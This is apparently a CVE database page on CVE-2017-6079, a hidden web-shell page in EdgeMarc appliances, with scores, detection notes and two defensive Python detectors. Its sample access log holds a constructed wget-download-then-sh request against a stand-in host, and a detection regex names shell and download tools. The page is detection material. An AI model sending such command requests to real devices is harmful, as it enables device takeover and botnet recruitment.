cbcvebase.
CVE-2017-6079
published 2017-05-16


Severity: critical, CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Priority: P184
Exploitation: exploited in the wild; listed in VulnCheck KEV
EPSS: 46.85% (98.7th percentile)
The HTTP web-management application on Edgewater Networks Edgemarc appliances has a hidden page that allows user-defined commands, such as specific iptables routes, to be set. The page can effectively be used as a web shell to execute commands, although the web application returns no output to the client: if the command is valid, it executes. An example is the wget command. The page has been confirmed present in firmware as old as 2006.
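As an added example (not from this page's sources or from Edgewater), the following Python script turns the behaviour described above into a check over web server access logs for the management application: it flags requests to pages outside a documented set of management pages, and requests whose parameter values look like shell commands rather than configuration values. The page name `/cgi-bin/hidden.cgi`, the `cmd` parameter, the documented-page list and the log lines are all constructed for illustration; the real hidden page's URL is not disclosed on this page.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log (combined log format). The hidden page name
# and the "cmd" parameter are hypothetical stand-ins; the real URL is not
# published on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [16/May/2017:10:01:02 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [16/May/2017:10:01:07 +0000] "GET /cgi-bin/hidden.cgi?cmd=wget+http%3A%2F%2F203.0.113.9%2Fx+-O+%2Ftmp%2Fx HTTP/1.1" 200 0 "-" "Wget/1.12"
203.0.113.9 - - [16/May/2017:10:01:09 +0000] "GET /cgi-bin/hidden.cgi?cmd=sh+%2Ftmp%2Fx HTTP/1.1" 200 0 "-" "Wget/1.12"
10.0.0.5 - - [16/May/2017:10:02:15 +0000] "POST /cgi-bin/firewall.cgi HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Assumption: the pages the appliance's admin UI actually links to. Any other
# path under the management app is treated as undocumented.
DOCUMENTED_PAGES = {"/cgi-bin/status.cgi", "/cgi-bin/firewall.cgi"}

# A parameter value that starts a download/firewall/shell binary, or chains
# commands with shell metacharacters, is treated as a command rather than a
# configuration value.
COMMAND_RE = re.compile(
    r"(?:^|[\s;|&`$(])(?:wget|curl|tftp|iptables|sh|bash|busybox|nc|chmod)(?:\s|$)"
    r"|[;|`]|&&|\$\(",
    re.IGNORECASE,
)


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl decodes '+' and %XX, so the value is what the CGI sees.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def assess(rec):
    """Return the list of reasons a parsed request is suspicious (empty if none)."""
    reasons = []
    if rec["path"].startswith("/cgi-bin/") and rec["path"] not in DOCUMENTED_PAGES:
        reasons.append("request to undocumented management page")
    for name, value in rec["params"]:
        if COMMAND_RE.search(value):
            reasons.append(f"command-like value in parameter {name!r}")
            break
    return reasons


def find_suspicious(log_text):
    """Scan a whole log and return one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = assess(rec)
        if reasons:
            findings.append({"src": rec["src"], "ts": rec["ts"],
                             "path": rec["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f["ts"], f["src"], f["path"], "; ".join(f["reasons"]))
```

Because the hidden page returns no output, the response size is not a useful signal on its own; the path and the parameter value are. The two hits in the constructed log are the download-then-execute pair that the description's wget example implies.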

Detection & IOCs (extracted from sources)

  • CVE-2017-6079 is exploited via a hidden web management page on Edgewater Networks Edgemarc appliances that allows arbitrary OS command execution (e.g., wget) with no client-side feedback; monitor HTTP requests to undocumented/hidden management pages on EdgeMarc devices for unexpected command parameters.
  • The EwDoor botnet exploits CVE-2017-6079 exclusively against EdgeMarc Enterprise Session Border Controller devices on AT&T carrier networks; detection should focus on anomalous outbound connections and C2 beaconing from these specific device types.
  • The hidden command-execution page vulnerability has been present in EdgeMarc firmware as far back as 2006, meaning a very wide range of firmware versions across many device generations may be affected.
  • Early EwDoor botnet samples contacted a non-existent C2 server (later registered by researchers), so C2 infrastructure indicators from early samples may no longer be valid; cybercriminals subsequently severed communication with that server.
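The second bullet says EwDoor detection should focus on anomalous outbound connections and C2 beaconing from EdgeMarc session border controllers. The following Python script is an added example of that logic (not from this page's sources) over constructed connection records: it keeps only flows from a device inventory, discards peers the SBC is expected to talk to, and flags a peer as beacon-like when the device contacts it repeatedly at a near-constant interval. The device addresses, expected peers, C2 address and cadence are all made up for illustration.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Assumption: inventory of EdgeMarc SBC addresses as seen in flow records.
EDGEMARC_DEVICES = {"192.0.2.10", "192.0.2.11"}

# Assumption: peers the SBCs are expected to reach (SIP trunk, NTP).
EXPECTED_PEERS = {("203.0.113.50", 5060), ("203.0.113.123", 123)}

BASE = 1_500_000_000  # arbitrary epoch seconds for the constructed records


def _build_flows():
    """Constructed connection records: (epoch_seconds, src, dst, dport)."""
    flows = []
    # Implant-style beacon: same peer every ~60 s with a little jitter.
    for i, jitter in enumerate([0, 1, -1, 0, 2, -1, 0, 1]):
        flows.append((BASE + 60 * i + jitter, "192.0.2.10", "198.51.100.7", 443))
    # Expected SIP signalling to the trunk, irregular timing.
    for off in (3, 47, 190, 260, 800):
        flows.append((BASE + off, "192.0.2.10", "203.0.113.50", 5060))
    # Second SBC: NTP, plus irregular HTTP to an unknown host (not a beacon).
    for off in (0, 1024, 2048):
        flows.append((BASE + off, "192.0.2.11", "203.0.113.123", 123))
    for off in (0, 5, 305, 325, 1225, 1285, 1300):
        flows.append((BASE + off, "192.0.2.11", "198.51.100.9", 8080))
    # A workstation polling the same host every 60 s: not an SBC, ignored.
    for i in range(8):
        flows.append((BASE + 60 * i, "10.0.0.20", "198.51.100.7", 443))
    return flows


FLOWS = _build_flows()


def find_beacons(flows, min_conns=6, max_cv=0.1):
    """Return peers an EdgeMarc device contacts at a near-constant interval.

    A peer is reported when the device opened at least `min_conns` connections
    to it and the coefficient of variation (stddev / mean) of the gaps between
    those connections is at most `max_cv`, i.e. the cadence is regular.
    """
    by_peer = defaultdict(list)
    for ts, src, dst, dport in flows:
        if src in EDGEMARC_DEVICES and (dst, dport) not in EXPECTED_PEERS:
            by_peer[(src, dst, dport)].append(ts)

    hits = []
    for (src, dst, dport), times in by_peer.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        period = mean(gaps)
        cv = pstdev(gaps) / period if period > 0 else float("inf")
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "dport": dport,
                         "count": len(times),
                         "period_s": round(period, 1), "cv": round(cv, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(FLOWS):
        print(f"{hit['src']} -> {hit['dst']}:{hit['dport']} "
              f"{hit['count']} connections, period {hit['period_s']}s, cv {hit['cv']}")
```

Restricting the check to the SBC inventory and subtracting expected peers is what keeps this usable on a carrier network: SIP and NTP traffic from these devices is itself periodic, so without the allowlist the detector would fire on normal signalling. The early EwDoor samples' C2 indicators are unreliable (see the last bullet), which is why this example keys on cadence rather than on a specific destination.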

CVSS provenance

  • NVD, CVSS v3.1: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • NVD, CVSS v2.0: 10.0 CRITICAL (AV:N/AC:L/Au:N/C:C/I:C/A:C)
  • VulnCheck: 9.8 CRITICAL